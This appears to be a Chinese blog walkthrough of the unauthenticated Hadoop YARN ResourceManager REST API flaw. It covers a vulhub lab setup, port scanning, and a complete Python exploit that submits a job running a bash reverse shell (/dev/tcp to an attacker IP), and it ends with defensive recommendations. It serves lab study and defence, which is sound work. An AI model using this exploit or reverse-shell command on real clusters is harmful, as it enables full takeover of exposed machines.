Hadoop YARN ResourceManager未授权访问漏洞
文章目录
- 一、介绍
- 1.1 简介
- 1.2 漏洞成因
- 二、模拟环境
- 三、信息收集
- 四、攻击方法
- 五、漏洞防御
一、介绍
1.1 简介
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度)
1.2 漏洞成因
负责对资源进行同一管理调度的ReasourceManager组件的UI管理界面开放在8080/8088端口,攻击者无需认证即可通过REST API部署任务来执行任意命令,最终可完全控制集群中所有的机器。
二、模拟环境
- 受害者IP:192.168.226.140(ens33)
- 攻击者IP:192.168.1.102
》》使用vulhub靶场,docker启动
启动报错
》》ping 不通
解决方法:(更换源)
》》查看当前源
》》写入自定义仓库
“registry-mirrors”:[“https://docker.mirrors.ustc.edu.cn”]
》》保存文件,重启
问题解决
》》启动后访问192.168.226.140:8088即可访问到Hadoop YARN ResourceManager WebUI界面
三、信息收集
》》通过nmap扫描目标IP发现在8088端口上开放了Jetty(hadoop使用jetty作为servlet容器提供HTTP服务来访问web后台用于管理hdfs和mapreduce等)
》》浏览器访问web界面
四、攻击方法
》》nc本地监听等待shell连接
》》执行exp
#!/usr/bin/env pythonimport requeststarget = 'http://192.168.226.140:8088/'
lhost = '192.168.226.134' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',
}
requests.post(url, json=data)
五、漏洞防御
- 网络访问控制,使用防火墙对受影响服务端口访问源IP进行控制
- 如Hadoop环境仅对内网提供服务,不要将端口服务暴露在公网
- 如使用自建Hadoop,根据实际情况更新补丁(Hadoop在2.x版本以上提供了安全认证功能,加入了Kerberos认证机制)
Hadoop YARN ResourceManager未授权访问漏洞相关推荐
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- Hadoophbase监控页面未授权访问漏洞处理方案验证过程实现
Hadoop&hbase监控页面未授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http ...
- 【应急类漏洞】————1、未授权访问漏洞总结
前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪.根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植 ...
- 常用的30+种未授权访问漏洞汇总
未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...
- 常用的端口及未授权访问漏洞
一.介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞.OpenSSL漏洞 25 SMTP协议 53 ...
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
- 未授权访问漏洞-Redis未授权访问漏洞
文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...
- UCloud-201809-001:Redis服务未授权访问漏洞安全预警
UCloud-201809-001:Redis服务未授权访问漏洞安全预警 尊敬的UCloud用户,您好! 发布时间 2018-09-11 更新时间 2018-09-11 漏洞等级 High CV ...
最新文章
- poj1741(树的点分治)
- set集合, 深浅拷贝, join, 列表和字典在循环中删除元素的问题, fromkeys( , )
- 查找python项目依赖并生成requirements.txt的两种方法
- 中标麒麟桌面版yum安装mysql_中标麒麟Neokylin6桌面版如何本地yum安装软件
- python 卡方分箱算法_python实现二分类的卡方分箱示例
- 纪中C组模拟赛总结(2019.7.12)
- java 小时转换为xx天xx小时
- Angular.js为什么如此火呢?
- python 性能测试_python 写一个性能测试工具(一)
- JAVA类,变量的赋值一个小细节,以及static标注变量的意义
- VSCode 将已编辑好的文件中的 tab 键转换成空格键
- springCloud教程链接
- 用SPSS求均值 方差 标准差小例题
- 一位 19 年 Mac 用户的心声:“我真的很讨厌库克”
- 怎么将pdf转换成word?
- js实现图片无缝滚动特效
- 关于时域、频域和波数域的一些概念
- 【转】MyEclipse8优化设置
- 威海综合竞争力跃居全国第27位
- 查询出每个雇员的姓名,工资,部门名称,工资在公司的等级及其领导的姓名,领导的工资,以及领导所对应的等级